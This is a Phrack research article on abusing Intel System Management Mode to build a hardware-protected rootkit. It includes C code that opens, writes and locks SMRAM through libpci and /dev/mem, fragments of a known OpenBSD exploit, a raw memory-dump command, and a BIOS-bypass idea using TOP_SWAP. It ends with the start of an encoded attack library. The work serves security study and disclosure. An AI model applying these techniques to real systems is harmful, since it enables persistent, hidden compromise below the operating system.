Title : System Management Mode Hacks
Author : BSDaemon and coideloko and D0nand0n
==Phrack Inc.==
Volume 0x0c, Issue 0x41, Phile #0x07 of 0x0f
|=-----------------------------------------------------------------------=|
|=-----------------=[ System Management Mode Hack ]=------------------=|
|=-----------------=[ Using SMM for "Other Purposes" ]=------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ By BSDaemon ]=--------------=|
|=---------------=[ <bsdaemon *noSPAM* risesecurity_org> ]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ coideloko ]=--------------=|
|=---------------=[ <cdlk *noSPAM* kernelhacking_com>]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ D0nAnd0n ]=--------------=|
|=---------------=[ <d0nand0n *noSPAM* kernelhacking.com>]=--------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ March 29 2008 ]=--------------------------=|
|=-----------------------------------------------------------------------=|
"Very nice! How much?"
- Borat Sagdyiev
------[ Index
1 - Introduction
1.1 - Paper structure
2 - System Management Mode
2.1 - Pentium modes of operation
2.2 - SMM Overview
2.2.1 - SMRAM
2.2.2 - SMI Handler
2.2.3 - SMI Triggering
2.2.4 - Duflot discovery - Exploit
2.3 - Duflot misses
2.3.1 - PCI Configuration
2.3.2 - Why and when the system generates a SMI
2.4 - SMM Internals - Our first experiences
2.4.1 - Analysing the SMM registers
2.4.2 - SMM Details
3 - SMM for evil purposes
3.1 - Challenges
3.1.1 - Cache-originated overwrites
3.1.2 - SMM Locking
3.1.3 - Portability
3.1.4 - Address translation
3.2 - Copying our code in the SMM space
3.2.1 - Testing
3.2.2 - Descriptor caches
3.2.3 - Code relocation
4 - SMM Manipulation Library
5 - Future and other uses
6 - Acknowledgements
7 - References
8 - Sources - Implementation details
------[ 1 - Introduction
This article will try to explain some details about the Intel Architecture
[1] and how it can be manipulated by a malicious user to create a complete
hardware-protected malware.
Also, since the main focus of the article are the System Management Mode
[1] features, we will go into details of the Duflot [2] study and beyond,
showing how to create a stable system running inside the SMM [3].
It's important to mention that everything showed here is really
processor-bridges-dependent (we are focusing on Intel processors [1]).
Since inside the SMM a malware could manipulate the whole system memory, it
can be used to modify kernel structures and create a powerful rootkit.
---[ 1.1 - Paper structure
The idea of this paper is to complete the studies about SMM, explaning how
to use it for evil purposes.
For that, the paper have been structured in two important portions:
Chapter 2 will give a basic knowledge of the Pentium modes of operation
(needed to better understand the other portions of the chapter) and them
will introduce what was the Duflot discoveries related to that. After that
the chapter will explain what Duflot missed, explaining why the system
behaves in the way that permits our uses, and introducing the SMM internals
and our library to manipulate the SMM.
Chapter 3 will explain how to use the SMM for evil purposes, explaning
the challenges to use the SMM and giving pratical samples on the use of our
library.
------[ 2 - System Management Mode
From the Intel manuals [1]:
"The Intel System Management Mode (SMM) is typically used to execute
specific routines for power management. After entering SMM, various parts
of a system can be shut down or disabled to minimize power consumption. SMM
operates independently of other system software, and can be used for other
purposes too."
Everytime we read something like "and can be used for other purposes" we
start to think: what the hell? What kind of other purposes?
It's interesting that every single sample in the Internet just points to
energy-related uses of the SMM, and says nothing about other purposes.
In 2006, Duflot and others [2] released a paper about how to use the SMM to
circumvent operating system protections. It was the first time that a
misuse of the SMM was shown, and it gave some ideas (like how to put a code
in SMM, how to manipulate the system memory inside SMM and how to force a
system to enter the SMM), leaving open many questions that will be answered
here (how to create a really stable code to subvert the SMM, how to
manipulate the SMM registers, difficulties in create a stable system
running inside the SMM and why the system behaves in the way he just said
in the paper).
---[ 2.1 - Pentium modes of operation
Everybody already knows about the modes of operation of the P6 family of
processors.
Real-mode is a 16-bit addressing mode, keept for legacy purposes and
nowadays just used in the boot process. Protected mode is a 32-bit mode
and provides the protection model used by the modern operation systems.
The Virtual 8086 mode have been introduced to garantee greater efficiency
when running programs created for older architectures (such as 8086 and
8088).
The System Management Mode (SMM) is another mode of operation that, as
already said, is supposed to be used to manage power functions.
Volume 3 of the Intel processor manuals [1] already explained the
acceptable transitions between those modes:
------------------- SMI (interrupt)
|->|Real Address Mode| -------------------------------------------|
| ------------------- <----------------------------------| |
| | PE=1 ^ PE=0 (requires ring0) or |rsm or |
| v | reset |reset V
| ------------------- ---------
reset | | Protected Mode | -------> SMI (interrupt) ------> | SMM Mode |
| ------------------- <------- rsm instruction <------ ---------
| | VM=1 ^ VM=0 | ^
| v | |rsm |
| ------------------- <----------------------------------| |
|- |Virtual 8086 Mode| -------------------------------------------|
------------------- SMI (interrupt)
P.S.: PE and VM are flags of the CR0 (control register 0)
Basically what we need to get from here is:
- Any mode of operation in the intel platform can make a transition to
the SMM mode if an SMI interrupt is issued.
- SMM mode will return to the previous mode by issuing a rsm
instruction (so the processor will read a saved-state to restore the
system to the previous situation before enter the SMM).
---[ 2.2 - SMM Overview
First of all, when the system enters the SMM mode, the whole processor
context must be saved in a way so that it can be restored later. By doing
so, the processor can enter in a special execution context and start
executing the SMI handler. To return from this mode there is the special
instruction RSM (can be used just inside the SMM itself) that will read the
saved context and return to the previous situation).
Also, in SMM the paging is disabled and you have a 16-bit mode of operation
, but all physical memory can be addressed (more on this later).
There are no restrictions to the I/O ports or memory, so we have the same
privileges as in Ring 0 (in fact, from SMM someone can just manipulate all
the system memory).
What Duflot showed is a way to put your own SMI handler, force the
processor to enter the SMM mode, change the system memory to bypass a
security protection (in his case, the securelevel of an OpenBSD system) and
then execute his own code changing the saved context to point to it.
---[ 2.2.1 - SMRAM
The System Management Mode has a dedicated memory zone called SMRAM. It's
located in the 0x1FFFF bytes starting at SMBASE (it may be bigger if the
system activates Extented SMRAM).
The default value of SMBASE is 0x30000, but since modern chipsets offer
relocation, it's commonly seen as 0xA0000 (BIOS relocates it to the same
memory-mapped base address used by the I/O ports of the video card).
As spotted by Duflot, the memory controller hub has a control register
called SMRAM Control Register that offers a bit (D_OPEN - bit 6) that, when
it's set, makes all memory accesses to the address space starting at SMBASE
be redirected to SMRAM.
If the processor is not in the SMM mode and the D_OPEN bit is not set, all
accesses to the SMRAM memory range are forwarded to the video card (when it
have been relocated to the shared address as said) - giving a protection to
the SMRAM, which we will use later to protect the malware). Else, if the
D_OPEN bit is set, the memory addressed will be the SMRAM.
Another important thing he showed concerning the handler is the bit number
4 (D_LCK) of the SMRAM Control Register, which, when set, protects the
SMRAM control register and thus, the SMRAM memory itself, if the D_OPEN bit
was not set at the time the control register was locked. To change it, the
system needs to reboot (which gives us a challenge, since most modern BIOS
will lock it).
It's well detailed in the Intel Manuals, but the fact that a super-user
could write to it using the video device and then force a SMI to be
triggered was really new.
When entering the SMM the processor will jump to the pysical address
SMBASE+0x8000 (which means that the SMI handler must be located at the
offset 0x8000 inside the SMRAM). Since when the D_OPEN bit is set we can
put some code in the SMRAM, we just need to force an SMI trigger to get
our code executed.
-----------------
SMBASE+0x1FFFF | |
| |
| |
| |
SMBASE+0xFFFF -----------------
| |
| State save area |
| |
SMBASE+0xFE00 -----------------
| |
| Code,Heap,Stack |
| |
SMBASE+0x8000 ----------------- ----> First SMI Handler instruction
| |
| |
| |
SMBASE=0xA0000 -----------------
---[ 2.2.2 - SMI handler
Since we will set the D_OPEN bit we need some way to avoid the display
usage, since all access to the video memory will be forwarded to SMRAM and
not to the video card. Duflot does not explain how it is possible, since
his sample was for OpenBSD and it assumed there was no one using the video
card (he showed an exploit for an OpenBSD problem but as a requisite,
there is no one using the X, for example).
In our samples, we will also show how to manipulate the registers directly,
but we will use the libpci [4] to guarantee no problems with this (since
the libpci uses the system interfaces to manipulate the PCI subsystem
avoiding race conditions in the resource usage). It's also more portable,
because libpci as we will show supports a lot of different operating
systems.
So, to insert the handler the attacker needs to:
- Verify if the D_LCK bit is not set
- Set the D_OPEN bit
- Have access to the memory address space (in the sample,
0xA0000-0xBFFFF)
To access the memory we can just mmap the memory range using the /dev/mem
device, because it provides access to the physical address space
(instead of the virtual vision provided by the /dev/kmem for example).
---[ 2.2.3 - SMI Triggering
Since the SMI signal is a hardware-generated interrupt there is no
instruction to generate it by software. The chipset may generate it, but
_when_ it does depends on the chipset [5][6].
Duflot also already explained in his paper the SMI_EN register, where the
least significant bit is a global enable, specifying whether SMIs are
enabled or not (the other bits of SMI_EN then control which devices can
generate an SMI).
The SMI_STS register keeps track of which device last caused an SMI.
These registers can be accessed using the regular PCI mechanisms ("in" and
"out"). The position of those register are variable, but they are in a
relative address to PMBASE (SMI_EN=PMBASE+0x30 and SMI_STS=PMBASE+0x34).
The PMBASE can be accessed using bus 0, device 0x1F, function 0 and offset
0x40.
More details of the PCI configuration mechanisms in the section 2.3.1.
---[ 2.2.4 - Duflot discovery - Exploit
In his paper Duflot & friends showed a working exploit against OpenBSD.
This will be our first code to be analyzed (also attached with small
modifications to work on Linux).
As can be seen, the code will have problems if there is an X Server running
,since it just forwards all video memory access to the SMRAM.
Since the Linux operating system (as most of unixes) provides a way to rise
the I/O privilege level in the user-mode, the exploit is using that in a
way it can use the instructions in/out:
if(iopl(3) < 0) {
To get access to the SMRAM, the D_OPEN bit must be set:
outl(data1, 0xcf8);
outl(data2, 0xcfc);
Also here, we can easily see that, in the handler, it is doing the
following:
addr32 mov $test, %eax
mov %eax, %cs:0xfff0
Here we have that the offset 0xfff0 is the saved EIP in the saved-state map
inside the SMRAM. By doing so, it is just putting the address of a function
in the saved-state map, so when the system triggers the rsm instruction
it will return to protected mode, but now executing the test() function
(the saved EIP).
Duflot discovered that accessing the Programmed I/O Port 0xB2 with the bit
5 of SMI_EN set will generate an SMI:
outl(0x0000000f, 0xb2);
For sure it's really funny... but what else can be done with that?
---[ 2.3 - Duflot misses
In his paper Duflot does not explain how the PCI Configuration really works
(for example, he just pointed to use the port 0xCF8 for address and port
0xCFC to perform the operation itself). Also, he never said when and why
the system generates a SMI. The idea of use the SMM to manipulate the
system memory can also be really expanded, to create a malware running
inside the SMM, or to bypass boot-protections and many others (like create
a system protection mechanism running on it).
The rest of this chapter and the next one will show many details about how
the SMM works and what we can use inside the SMM. Also, will better
explain how to analyse the system and create a portable library to
manipulate the SMM-related registers.
---[ 2.3.1 - PCI Configuration
The original PCI specification [11] defined two mechanisms for i386 PCs,
but later specifications deprecated one of these ways. Since this
specification is not free, we highly recommend you to read a book about
that [12].
Basically, you have two I/O port ranges: one associated to the address port
(0xCF8-0xCFB) and the other to the data port (0xCFC-0xCFF).
To configure a device, you must write to the address port which device and
register you want to access and then read/write the data from/to the data
port.
The rule about the format of the data written to the address port is as
following:
Bits Description
0..1 00b (always 0)
2..7 Which 32-bit space in the config space to access
8..10 Device function
11..15 Device Number
A complete list of PCI vendors and devices can be found in [13].
PCI devices have an address which is broken down into a PCI-bus number, a
device number within that bus (values 0-31), and a function number within
the device (values 0-7).
Since a single sample is more valuable, to access a register REG in the
bus:device:function PCI space you will need to use the following address:
0x80000000L | ((bus & 0xFF) << 16) |
((((unsigned)device) & 0x1F) << 11) |
((((unsigned)func) & 0x07) << 8) | (REG & 0xFC);
In each PCI device's configuration space there's normally one or more
BARs (Base Address Registers), which can be used to set or find the address
in physical memory or in I/O space of each resource the card uses.
---[ 2.3.2 - When and why the system generates a SMI
All memory transactions (read/write memory access) from the CPU are placed
on the host bus to be consumed by some device.
Potentially the CPU itself would decode a range (of memory) such as the
Local APIC range, and the transaction would be satisfied before needing
to be placed on the external bus at all.
If the CPU does not claim the transaction (don't decode), then it must be
sent out. In a typical Intel architecture, the transaction would next be
decoded by the MCH (Memory Controller Hub) and be either claimed as an
address that the MCH owns, or it's determining based on decoders that the
transaction is not owned by the MCH and thus should be forwarded on to the
next possible device in the chain.
If the memory controller does not find the address to be within actual
DRAM, then it looks to see if it falls within one of the other I/O ranges
it owns (ISA, EISA, PCI).
Depending on how old the system is, the memory controller may directly
decode PCI transactions (instead of pass that to the I/O bridges), for
example.
If the MCH determines that the transaction does not belong to it, the
transaction will be forwarded down to whatever I/O bridge(s) may be present
in the system. This process of decoding for ownership / response or
forwarding down if not owned repeats until the system runs out of potential
agents.
The final outcome is either an agent claims the transaction and returns
whatever data is present at the address, or no one claims the address and
an abort occurs to the transaction, typically resulting in 0FFFFFFFFh data
being returned.
In some situations (Duflot paper's case), some addresses (for example those
falling within the 0A0000h - 0BFFFFh range) are owned by two different
devices (VGA frame buffer and system memory). This will force the
architecture to send a SMI signal to satisfy the transaction.
If no SMI is asserted, then the transaction is ultimately passed over by
the memory controller, so that the VGA controller (if present) can claim
it.
If the SMI signal is asserted when the transaction is received by the
memory controller, then the transaction will be forwarded to the DRAM
unit for fetching the data from physical memory (executing our handler).
---[ 2.4 - SMM Internals - Our first experiences
Here we will clarify some important details about SMM and how it works.
This will be important to better understand the attached library.
---[ 2.4.1 - Analyzing the SMM registers
Let's start by analyzing the SMM using libpci, so we can have more
stability doing this.
The following code is known to work fine in ICH5 and ICH3M controllers.
--- code ---
#include <stdio.h>
#include <pci/pci.h>
#include <sys/io.h>
/* Defines - bit positions (will be used in more samples) */
#define D_OPEN_BIT (0x01 << 6)
#define D_CLS_BIT (0x01 << 5)
#define D_LCK_BIT (0x01 << 4)
#define G_SMRAME_BIT (0x01 << 3)
#define C_BASE_SEG2_BIT (0x01 << 2)
#define C_BASE_SEG1_BIT (0x01 << 1)
#define C_BASE_SEG0_BIT (0x01)
/* Function to print SMRAM registers */
void show_smram(struct pci_dev* SMRAM)
{
u8 smram_value;
/* Provided by libpci */
smram_value = pci_read_byte(SMRAM, SMRAM_OFFSET);
if(smram_value & D_OPEN_BIT) {
printf("D_OPEN_BIT: 1\n");
} else {
printf("D_OPEN_BIT: 0\n");
}
if(smram_value & D_CLS_BIT) {
printf("D_CLS_BIT: 1\n");
} else {
printf("D_CLS_BIT: 0\n");
}
if(smram_value & D_LCK_BIT) {
printf("D_LCK_BIT: 1\n");
} else {
printf("D_LCK_BIT: 0\n");
}
if(smram_value & G_SMRAME_BIT) {
printf("G_SMRAME_BIT: 1\n");
} else {
printf("G_SMRAME_BIT: 0\n");
}
if(smram_value & C_BASE_SEG2_BIT) {
printf("C_BASE_SEG2_BIT: 1\n");
} else {
printf("C_BASE_SEG2_BIT: 0\n");
}
if(smram_value & C_BASE_SEG1_BIT) {
printf("C_BASE_SEG1_BIT: 1\n");
} else {
printf("C_BASE_SEG1_BIT: 0\n");
}
if(smram_value & C_BASE_SEG0_BIT) {
printf("C_BASE_SEG0_BIT: 1\n");
} else {
printf("C_BASE_SEG0_BIT: 0\n");
}
printf("\n");
}
int main(void) {
struct pci_access *pacc;
struct pci_dev *SMRAM;
/* Provided by libpci */
pacc = pci_alloc();
pci_init(pacc);
SMRAM = pci_get_dev(pacc, 0, 0, 0, 0);
printf("Current status of SMRAM:\n");
show_smram(SMRAM);
printf("Setting D_OPEN to 1\n");
pci_write_byte(SMRAM, SMRAM_OFFSET, 0x4a);
show_smram(SMRAM);
printf("Locking SMRAM\n");
pci_write_byte(SMRAM, SMRAM_OFFSET, 0x1a);
show_smram(SMRAM);
printf("Trying to set D_OPEN to 0\n");
pci_write_byte(SMRAM, SMRAM_OFFSET, 0x0a);
show_smram(SMRAM);
return 0;
}
--- end code ---
Compile this using:
gcc -o brazil_smm1 brazil_smm1.c -lpci -lz
An execution sample:
rrbranco:~/Phrack# ./brazil_smm1
Current status of SMRAM:
D_OPEN_BIT: 0
D_CLS_BIT: 0
D_LCK_BIT: 0
G_SMRAME_BIT: 0
C_BASE_SEG2_BIT: 0
C_BASE_SEG1_BIT: 0
C_BASE_SEG0_BIT: 0
Setting D_OPEN to 1
D_OPEN_BIT: 1
D_CLS_BIT: 0
D_LCK_BIT: 0
G_SMRAME_BIT: 0
C_BASE_SEG2_BIT: 0
C_BASE_SEG1_BIT: 0
C_BASE_SEG0_BIT: 0
Locking SMRAM
D_OPEN_BIT: 1
D_CLS_BIT: 0
D_LCK_BIT: 1
G_SMRAME_BIT: 0
C_BASE_SEG2_BIT: 0
C_BASE_SEG1_BIT: 0
C_BASE_SEG0_BIT: 0
Trying to set D_OPEN to 0
D_OPEN_BIT: 1
D_CLS_BIT: 0
D_LCK_BIT: 1
G_SMRAME_BIT: 0
C_BASE_SEG2_BIT: 0
C_BASE_SEG1_BIT: 0
C_BASE_SEG0_BIT: 0
---[ 2.4.2 - SMM Details
When the processor enters the SMM mode it will signal an output pin,
aSMIACT#, to notify the chipset that the processor is in the SMM.
The SMI interrupt itself can be triggered anytime, except while the
processor is already in SMM (of course). This will cause the SMM handler to
be executed (as we already showed).
Since the SMIACT# was noticed by the chipset, all further memory accesses
will be redirected to the SMRAM protected memory. After that, the processor
will start to save its internal state in the saved_state map area, inside
the SMRAM. Then, the handler starts to execute.
What is the current state? The processor is in a 'real mode', with all
segments containing 4GB limit and being readable/writable.
As said, to leave the SMM, the RSM instruction is issued by the handler,
and then the processor reads the saved-state map again, performing just
some checks on it (that's good) restoring the system to the previouas
situation.
SMM writes data in the saved-state map exactly in the same way as the stack
does, from top to bottom beginning from the SMBASE register (thus,
permiting relocation). It's important to keep this in mind when
manipulating the saved-state map.
If the system enters SMM by result of a halt or I/O instruction, the
handler can tell the system to continue the execution after that or to
enter the halt state just setting a flag in the saved-state map.
Upon entrance in SMM the interrupts are disabled (including the
asyncronous NMI (Non Maskable Interrupt) and INIT), and the IDT (interrupt
description table) register keeps it's value. In order to service
interrupts inside SMM (a motivation for that will be showed), one needs to
setup an own interrupt vector [14] and reload the IDT with your new value,
since the values contained in the old IDT are no longer valid in the
address space used by SMM.
After the STI instruction, the system start to receive some interrupts
but will still miss the asyncronous ones. To enable that is needed to
issue the IRET/IRETD instructions.
The big concern about re-enabling interrupts inside the SMM handler is that
if an NMI interrupt is received while inside the handler, it will be
latched. So, potentially any verification done inside the SMM handler can
be bypassed if someone hooked the NMI handler routine (this routine would
be executed immediately after the RSM, before the processor starts
executing the code pointed by the EIP in the saved-state map).
During our tests, SMM relocation gave us some problems in older machines
(pentium II/III). Also, we preferred to use those machines to test our
things, since there is no SMM locking being done by the BIOS (generally
saying, BIOS older than 2 years).
Apparently, those older processors had a fixed CS value point to 0x30000
(the default SMM position - relocated by most of modern BIOS to 0xA0000 as
we already said).
If we enable interrupts inside the SMM, when an interrupt is invoked, it
will save CS:IP in the stack for further return. But it will use the fixed
value of CS (0x30000) instead of using the SMBASE value, not reflecting
the right code segment that the SMM is actually using and, therefore, the
code will return to the wrong location.
Also, the Intel documentation mentions alignment problems in the SMBASE
value in older processors (previously to PIV).
------[ 3 - SMM for evil purposes
As already said, the SMM can be used to modify kernel internal structures.
Here we will also show some challenges and other possible uses for a
malware code running inside the SMM.
---[ 3.1 - Challenges
---[ 3.1.1 - Cache-originated overwrites
When entering the SMM, the SMRAM may be overwritten by data in the cache
if a #FLUSH occur after the SMM entrance.
To avoid that we can shadow SMRAM over non-cacheable memory or assert
#FLUSH simultaneously to #SMI events (#FLUSH will be served first).
Most BIOS mark the SMRAM range as non-cacheable for us (and also locks it,
since Duflot paper publication).
---[ 3.1.2 - SMM Locking
Most BIOS manufacturers lock the SMM nowadays. When you are inserting a
protecting mechanism using the SMM you can just replace the system BIOS
for an open-source one (see LinuxBIOS [7]).
When we are talking about malicious code, this cannot be done and some
kind of BIOS patching must take place.
This article is focusing in the SMM manipulation itself, but a good
approach to bypass the BIOS protection is to use the TOP_SWAP [8] bit to
execute our code before the original BIOS code and then load our SMM
handler and lock it (this will prevent the original BIOS to overwrite our
SMM handler).
Basicaly this bit is used to define if the system will use the first 64K
or the second one as area to load the BIOS from. Knowing that, someone
can just set the TOP_SWAP bit, put own code in the second 64K area and in
the code jump back to the original BIOS code. This code will be runned
BEFORE the BIOS.
The TOP_SWAP bit exists to provide a secure way to BIOS update - the BIOS
code is copied to the second 64K, the TOP_SWAP bit is set, the update is
done and an integrity check is performed - if there is anything that makes
the system to reboot, it will restart in the second 64K which holds a copy
of the original BIOS without any problems.
---[ 3.1.3 - Portability
As said, the SMM is harware-dependent, more specifically it's
ICH-dependent.
The attached code is know to work in ICH5 and ICH3M, tested under Linux,
but since it uses the libpci, it's supposed to work also in FreeBSD,
NetBSD, OpenBSD (also tested on it), Solaris, Aix, GNU/Hurd and Windows).
To provide support to other ICHs one must edit the libSMM.h header file to
specify the correct location of the bus, device, function and offset and
then be sure the PMBASE returned by the function get_pmbase() is right
(comparing to the manuals).
After that, verify if the SMRAM_OFFSET is correctly defined (you can get
that in your I8xx manuals). If so, the bits in the SMRAM control register
will be correctly showed (you can easily test it using the D_LCK bit, since
when set will not permit any other bit to be manipulated). One can also
test it using the dd command showed next in this article and the D_OPEN bit
(use the open_smram function, write to the SMRAM memory mmap'ing it and
then dump it to verify if it's working).
---[ 3.1.4 - Address translation
Address translation is a great difficulty when we are inside our handler,
since we need the value of the CR3 register (which we can get from the
saved-state map) to manually parse the page tables and then perform the
actual translation.
Another approach is to just transfer the control back to our code in the
same way that Duflot did, but we need to save the current processor
status inside SMM, so after the execution of our code (after the SMM) we
can transfer the control back to the process that was executing before
triggering the SMI (else we would have some portions of the system just
stopping to work after our malware get executed).
This is not good...
The best thing that we can do is just have a simple handler that gives the
biggest privilege level of execution to the calling code (i.e. the code
that was executing before the SMI) and then return. By doing so, we avoid
to stay too much time in the SMM context and don't need to care about
stopped OS processes.
In the next sections we clarify how to put code in the SMM space, test it
and then an approach using the descriptor caches to provide the above
statement.
---[ 3.2 - Copying our code in the SMM space
---[ 3.2.1 - Testing
So, the first step to put some code in the SMM is to open the SMRAM by
setting the D_OPEN bit.
--- code ---
pci_write_byte(smram_dev, SMRAM_OFFSET, (current_value | D_OPEN_BIT));
--- end code ---
To close it after we finish, we will use the following:
--- code ---
pci_write_byte(smram_dev, SMRAM_OFFSET, (current_value & ~D_OPEN_BIT));
--- end code ---
Also, after inserting our code, we want to lock SMRAM access, avoiding
anyone from changing the SMM-related registers.
--- code ---
pci_write_byte(smram_dev, SMRAM_OFFSET, (current_value | D_LCK_BIT));
--- end code ---
In order to get our code inserted in the SMRAM memory, we need to map it,
in the same way we did in the exploit.
--- code ---
fd = open(MEMDEV, O_RDWR);
if(fd < 0) {
fprintf(stderr, "Opening %s failed, errno: %d\n", MEMDEV, errno);
return -1;
}
vidmem = mmap(NULL, MAPPEDAREASIZE, PROT_READ | PROT_WRITE, MAP_SHARED,
fd, SMIINSTADDRESS);
if(vidmem == MAP_FAILED) {
fprintf(stderr, "Could not map memory area, errno: %d\n", errno);
return -1;
}
close(fd);
/* Here we are copying our code to the SMRAM memory */
if(vidmem != memcpy(vidmem, handler, endhandler-handler)) {
fprintf(stderr, "Could not copy asm to memory...\n");
return -1;
}
if(munmap(vidmem, MAPPEDAREASIZE) < 0) {
fprintf(stderr, "Could not release mapped area, errno: %d\n", errno);
return -1;
}
--- end code ---
It's a good idea to verify if it's working properly, and also make a
previous copy of your SMRAM memory contents before that.
So, let's do that using dd:
dd if=/dev/mem of=my_smram bs=1 skip=`expr 655360 - 1` count=64K
P.S.: 655360 is 0xa0000 in decimal (as spotted by Duflot, SMM is commonly
relocated to that address instead 0x30000, as in the default case)
---[ 3.2.2 - Descriptor caches
This idea worked in some system and not in some others, since the Intel
documentation is not exactly clever about this subject.
From the Intel manual: "Every segment register has a visible part and a
hidden part (The hidden part is sometimes referred to as a descriptor
cache or a shadow register). When a segment selector is loaded into the
visible part of a segment register, the processor also loads the hidden
part of the segment register with the base address, segment limit, and
access control information from the segment descriptor pointed to by the
segment selector."
"Access control information" is refering to the well know xPL:
- RPL -> Request privilege level
- CPL -> Current privilege level
- DPL -> Descriptor privilege level
In the saved-state map inside the SMRAM, also according to the Intel
manuals, are saved the descriptor caches and the CR4 register (the manual
says it's not readable and write to this values will cause an
"unpredictable behavior").
We found the following:
TSS Descriptor Cache (12-bytes) - Offset: FFA7
IDT Descriptor Cache (12-bytes) - Offset: FF9B
GDT Descriptor Cache (12-bytes) - Offset: FF8F
LDT Descriptor Cache (12-bytes) - Offset: FF83
GS Descriptor Cache (12-bytes) - Offset: FF77
FS Descriptor Cache (12-bytes) - Offset: FF6B
DS Descriptor Cache (12-bytes) - Offset: FF5F
SS Descriptor Cache (12-bytes) - Offset: FF53
CS Descriptor Cache (12-bytes) - Offset: FF47
ES Descriptor Cache (12-bytes) - Offset: FF3B
The saved-state map is stored at SMBASE + 0xFE00 to SMBASE + 0xFFFF.
Modifying the DPL field of the SS descriptor cache from 3 to 0 gives ring0
power to our program (and a General Protection Fault in newer processors).
---[ 3.2.3 - Code relocation
SMM has the ability to relocate its protected memory space. The SMBASE
value saved in the state save map may be modified. This value is read
during the RSM instruction. When SMM is next entered, the SMRAM will be
located at this new address.
From our SMM handler, in the saved-state map, we can modify this value (at
offset 0xFEF8 from SMBASE). To perform that, we must care about CS
adjustments inside our code.
It can be used to relocate the SMRAM to memory area of our choosing and
trick those who try to dump the SMRAM for analysis using the standard
SMBASE values (anyway, since our malware is locking the SMM and clearing
the D_OPEN bit, we don't need to use this technique).
------[ 4 - SMM Manipulation Library
The SMM Manipulation Library attached in this article provides an easy
way to create portable code to manipulate the SMRAM control register.
It offers the following methods:
u8 show_smram (struct pci_dev* smram_dev, u8 bits_to_show)
It's used to test if specific bits are set or not
The pci_dev structure are optional, NULL can be passed.
u16 get_pmbase (void)
Internally used by the library to manipulate the SMI-enablement.
Exported by the function to turn easy to an external program
verify the correct offsets for the SMI_EN and SMI_STS.
u16 get_smi_en_iop (void)
Return the location of the SMI_EN
u16 get_smi_sts_iop (void)
Return the location of the SMI_STS
int enable_smi_gbl (u16 smi_en_iop)
Enable SMI globally
int disable_smi_gbl (u16 smi_en_iop)
Disable SMI globally
int enable_smi_on_apm (u16 smi_en_iop)
Enable SMI on APM events
int disable_smi_on_apm (u16 smi_en_iop)
Disable SMI on APM events
int open_smram(void)
Open SMRAM for access (set D_OPEN bit)
int close_smram(void)
Close SMRAM for access (unset D_OPEN bit)
int lock_smram(void)
Lock the SMRAM (set D_LCK bit)
void write_to_apm_cnt(void)
Write to the APM CNT (generate a SMI)
Also, the include file libSMM.h contains the valid values to be used to
locate related registers and bit's for the SMM manipulation, like the
device, function bus and offsets. It contains specify defines for
interesting bits inside the SMRAM control register too, like the D_OPEN
and the D_LCK.
Attached to the article is also the file libSMM_test.c showing how to use
the SMM Manipulation Library. This program will basically set and unset
all control registers that will affect the SMM manipulation. It can be
used to test if the library is working propertly in your hardware and
since it will also test the D_LCK bit, one need to reboot after run this
program.
The evil.c code also attached will use the SMM Manipulation Library to
insert a small SMM handler that freezes the processor.
------[ 5 - Future and other uses
We can't foresee the future, but modern rootkits are becoming much more
targeted, so this kind of deeper hackishs will start to be more widely
seen.
Also, with new platforms to BIOS enhancements, like the Extensible Firmware
Interface, everything that depends on boot patching will be easier [9].
Another important thing to notice is the virtualization resources that
exist nowadays and some possibilities of using them in implementations of
hardware protected integrity-check systems [10].
------[ 6 - Acknowledgments
A lot of people helped us in the long way these researches that resulted in
something funny to be published, you all know who you are.
Special tks to twiz and the Phrack Staff for the great review of the
article, giving a lot of important insights about how to better structure
it and giving a real value to it.
Finally, big tks to Julio Auto for the review of the article drafts.
BSDaemon:
Conference organizers who invited me to talk about protection
mechanisms using SMM (yeah, a lot of fun in completely different cultures).
To my girlfriend who waited for me (alone, I suppose) during this travels.
RISE Security (http://www.risesecurity.org) for always keeping me motivated
studying completely new things.
------[ 7 - References
[1] - Intel Architecture Reference Manuals
http://www.intel.com/products/processor/manuals/index.htm
[2] - Loic Duflot, Daniel Etiemble, Olivier Grumelard, "Using CPU System
Management Mode to Circumvent Operating System Security Functions"
Proceedings of CanSecWest, 2006
[3] - Branco, Rodrigo Rubira, "KIDS - Kernel Intrusion Detection System"
Hackers to Hackers Conference, 2007
[4] - LibPCI for Linux
ftp://ftp.kernel.org/pub/software/utils/pciutils/
[5] - Intel 82801 BA-I/O Controler HUB (ICH2) Datasheet
http://www.intel.com/design/chipsets/datashts/290687.htm
[6] - Intel 82845 Memory Controler HUB (MCH) Datasheet
http://www.intel.com/design/chipsets/datashts/290725.htm
[7] - LinuxBIOS
http://freshmeat.net/projects/linuxbios
[8] - Bing, Sun, "BIOS Boot Hijacking By Using Intel ICHx "Top-Block Swap"
Mode"
XFocus Information Security Conference, 2007
[9] - Heasman, John, "Hacking the Extensible Firmware Interface"
Blackhat Las Vegas Briefings, 2007
[10] - Branco, Rodrigo Rubira, "StMichael Project"
http://stjude.sf.net
[11] - PCI Specification
http://www.pcisig.com
[12] - Shanley, Tom; Anderson, Don; "PCI System Architecture"
Mindshare Inc
ISBN 0-201-30974-2
Publisher: Addison Wesley
[13] - PCI Database
http://www.pcidatabase.com
[14] - devik & sd; "Linux on-the-fly kernel patching without LKM"
Phrack 58
------[ 8 - Sources - Implementation details [brazil_SMM.tgz]
Attached a GPLed library that will help you to manipulate the SMM-related
features, accompanied by some programs displaying sample usage.
Further updates will be available in the StMichael project website, at:
http://stjude.sf.net
begin 644 brazil_SMM.tgz
M'XL(`-M5[D<``^Q;VW+;2)+UZU3L1U3HI:4(FFWY.MU^HB3*XHY$JDG*;CUM
M@$211!L$."A`,O?K]V1F%5#@Q9[9F-Z(B5C%],@B"EE9>3V9E9P5T7\GZ7]-
M[NY^?O%G_;S"SX=W[^CW^8=WK\+?_N?%^:L/']Z\???Z_?OW+UZ=O_[PYLT+
M_>Y/XRCXJ6P9%5J_*&9%E,WSH^M^]/S?]&?6Z#]-9G^.#?SS^G_S[M7Y_^O_
M_^)G1_^WR=QDUOQK]R`%OW_[UNM[Y_?;-^=P=NC__5L8Q9L/KTG_[]^^>Z%?
M_6O9./Q3ZS_/R^^M^]'S?].?O_Q%X^?3\$%_Z@_[X]ZMOG^XN!U<:OS7'T[Z
M2A;@Y[,I;))G^G5'_V>5&7W^RR_G2NG+?+,MDN6JU*>79_CPK[]T^)&^+HS1
